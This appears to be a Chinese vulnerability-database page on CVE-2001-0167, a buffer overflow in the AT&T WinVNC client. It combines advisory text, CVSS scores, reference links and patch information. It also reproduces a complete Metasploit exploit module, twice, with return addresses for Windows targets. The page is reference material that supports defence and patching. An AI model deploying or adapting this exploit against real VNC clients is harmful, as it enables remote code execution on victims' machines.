CVE-2001-0167
CVSS7.6
发布时间 :2001-05-03 00:00:00
修订时间 :2016-10-17 22:10:05
NMCOEPS    

[原文]Buffer overflow in AT&T WinVNC (Virtual Network Computing) client 3.3.3r7 and earlier allows remote attackers to execute arbitrary commands via a long rfbConnFailed packet with a long reason string.


[CNNVD]AT&T WinVNC 客户程序缓冲区溢出漏洞(CNNVD-200105-044)

        CVE(CAN) ID: CAN-2001-0167
        
        
        
        VNC 指虚拟网络计算软件包。它是可免费获得的远程
        
        管理软件包,设计用来访问远程系统的桌面,由 AT&T
        
        发行和维护。
        
        
        
        该软件包的客户部分存有问题,这使得远程用户可以
        
        执行任意代码。问题来源于在连接和认证时客户端对
        
        服务器发给客户的 rfbConnFailed 包的处理。发送
        
        这个包是出错回应,通常是告知客户连接尝试已失败。
        
        这时客户端通过一个日志例程传递这个包的内容供将
        
        来管理作参考。然而,通过伪造服务器版本号,并且
        
        在发送 rfbConnFailed 时填入长 1024 字节的原因
        
        字符串,但把原因字符串长度值赋大于 1024 的值,
        
        缓冲区溢出就发生了。这个溢出可以用来覆盖堆栈变
        
        量,包括返回地址,这样就可以执行任意代码。
        
        
        
        这个漏洞使得恶意用户可以在远程系统以 WinVNC 客
        
        户的权限执行任意代码。
        
        
        
        <* 来源:Emiliano Kargieman, Agustin Azubel, Maximiliano Caceres *>
        
        
        
        

- CVSS (基础分值)

CVSS分值: 7.6 [严重(HIGH)]
机密性影响: [--]
完整性影响: [--]
可用性影响: [--]
攻击复杂度: [--]
攻击向量: [--]
身份认证: [--]

- CPE (受影响的平台与产品)

产品及版本信息(CPE)暂不可用

- OVAL (用于检测的技术细节)

未找到相关OVAL定义

- 官方数据库链接

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2001-0167
(官方数据源) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2001-0167
(官方数据源) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200105-044
(官方数据源) CNNVD

- 其它链接及资源

http://marc.info/?l=bugtraq&m=98088315825366&w=2
(UNKNOWN)  BUGTRAQ  20010129 [CORE SDI ADVISORY] WinVNC client buffer overflow
http://www.securityfocus.com/bid/2305
(VENDOR_ADVISORY)  BID  2305
http://xforce.iss.net/static/6025.php
(VENDOR_ADVISORY)  XF  winvnc-client-bo

- 漏洞信息

AT&T WinVNC 客户程序缓冲区溢出漏洞
高危 边界条件错误
2001-05-03 00:00:00 2006-04-07 00:00:00
远程  
        CVE(CAN) ID: CAN-2001-0167
        
        
        
        VNC 指虚拟网络计算软件包。它是可免费获得的远程
        
        管理软件包,设计用来访问远程系统的桌面,由 AT&T
        
        发行和维护。
        
        
        
        该软件包的客户部分存有问题,这使得远程用户可以
        
        执行任意代码。问题来源于在连接和认证时客户端对
        
        服务器发给客户的 rfbConnFailed 包的处理。发送
        
        这个包是出错回应,通常是告知客户连接尝试已失败。
        
        这时客户端通过一个日志例程传递这个包的内容供将
        
        来管理作参考。然而,通过伪造服务器版本号,并且
        
        在发送 rfbConnFailed 时填入长 1024 字节的原因
        
        字符串,但把原因字符串长度值赋大于 1024 的值,
        
        缓冲区溢出就发生了。这个溢出可以用来覆盖堆栈变
        
        量,包括返回地址,这样就可以执行任意代码。
        
        
        
        这个漏洞使得恶意用户可以在远程系统以 WinVNC 客
        
        户的权限执行任意代码。
        
        
        
        <* 来源:Emiliano Kargieman, Agustin Azubel, Maximiliano Caceres *>
        
        
        
        

- 公告与补丁

        
        
        厂商补丁:
        
        
        
         CNNVD建议您立即下载补丁程序打上补丁:
        
        
        
         ftp://ftp.core-sdi.com/pub/patches/VNC-clientBO.patch
        

- 漏洞信息 (16489)

RealVNC 3.3.7 Client Buffer Overflow (EDBID:16489)
windows remote
2010-04-30 Verified
0 metasploit
N/A [点击下载]
##
# $Id: realvnc_client.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RealVNC 3.3.7 Client Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2001-0167' ],
					[ 'OSVDB', '6281' ],
					[ 'BID', '2305' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
					[ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 29 2001',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
			], self.class)
	end

	def on_client_connect(client)

		rfb = "RFB 003.003\n"

		client.put(rfb)
	end

	def on_client_data(client)
		return if ((p = regenerate_payload(client)) == nil)

		filler = make_nops(993 - payload.encoded.length)

		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
		sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
		sploit << rand_text_english(200)

		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
		client.put(sploit)

		handler
		service.close_client(client)
	end

end
		

- 漏洞信息 (F83177)

RealVNC 3.3.7 Client Buffer Overflow (PacketStormID:F83177)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
CVE-2001-0167
[点击下载]

This Metasploit module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'RealVNC 3.3.7 Client Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in RealVNC 3.3.7 (vncviewer.exe).
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2001-0167' ],
					[ 'OSVDB', '6281' ],
					[ 'BID', '2305' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00\x0a\x0d\x20\x22\x25\x26\x27\x2b\x2f\x3a\x3c\x3e\x3f\x40",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
					[ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Jan 29 2001',
			'DefaultTarget'  => 0))

		register_options(
			[ 
				OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
			], self.class)
	end

	def on_client_connect(client)

		rfb = "RFB 003.003\n"

		client.put(rfb)
	end

	def on_client_data(client)
		return if ((p = regenerate_payload(client)) == nil)

		filler = make_nops(993 - payload.encoded.length)

		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + filler + payload.encoded
		sploit << [target.ret].pack('V') + make_nops(10) + [0xe8, -457].pack('CV')
		sploit << rand_text_english(200)

		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
		client.put(sploit)

		handler
		service.close_client(client)
	end

end
    

- 漏洞信息

6281
AT&T WinVNC Client rfbConnFailed Packet Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Solution Unknown
Exploit Public

- 漏洞描述

A buffer overflow exists in WinVNC. The client fails to validate rfbConnFailed packets resulting in a buffer overflow. With a specially crafted packet, a remote attacker can cause arbitrary code execution resulting in a loss of integrity.

- 时间线

2001-01-29 Unknow
Unknow Unknow

- 解决方案

Currently, there are no known upgrades, patches, or workarounds available to correct this issue.

- 相关参考

- 漏洞作者

- 漏洞信息

AT&T WinVNC Client Buffer Overflow Vulnerability
Boundary Condition Error 2305
Yes No
2001-01-29 12:00:00 2007-11-02 04:26:00
This vulnerability was discovered by Emiliano Kargieman, Agustin Azubel, and Maximiliano Caceres of Core-SDI, and announced to Bugtraq a Core-SDI Security Advisory on January 29, 2001.

- 受影响的程序版本

AT&T WinVNC Client 3.3.3 r7
- Microsoft Windows 2000 Professional
- Microsoft Windows 98SE
- Microsoft Windows ME
- Microsoft Windows NT 4.0
AT&T WinVNC 3.3.3 r9

- 漏洞讨论

VNC is the Virtual Network Computing package, a freely available remote administration package designed to allow access to a remote system desktop. It is distributed and maintained by AT&T.

A problem with the client portion of the package could allow a remote user to execute arbitrary code. This is due to the handling of the 'rfbConnFailed' packet sent from the server to the client during connection and authentication.

This issue allows an attacker to execute code on a remote system, with the privileges of the user of the WinVNC client.

- 漏洞利用

UPDATE: Core Security Technologies has developed a working commercial exploit for its CORE IMPACT product. This exploit is not otherwise publicly available or known to be circulating in the wild.

A Metasploit exploit module is available.

- 解决方案

A patch has been provided by Core-SDI as part of its advisory.


AT&T WinVNC Client 3.3.3 r7

- 相关参考

 

 

关于SCAP中文社区

SCAP中文社区是国内第一个以SCAP为主题的中文开放社区。了解更多信息,请查阅[关于本站]

版权声明

CVE/CWE/OVAL均为MITRE公司的注册商标,它们的官方数据源均保存在MITRE公司的相关网站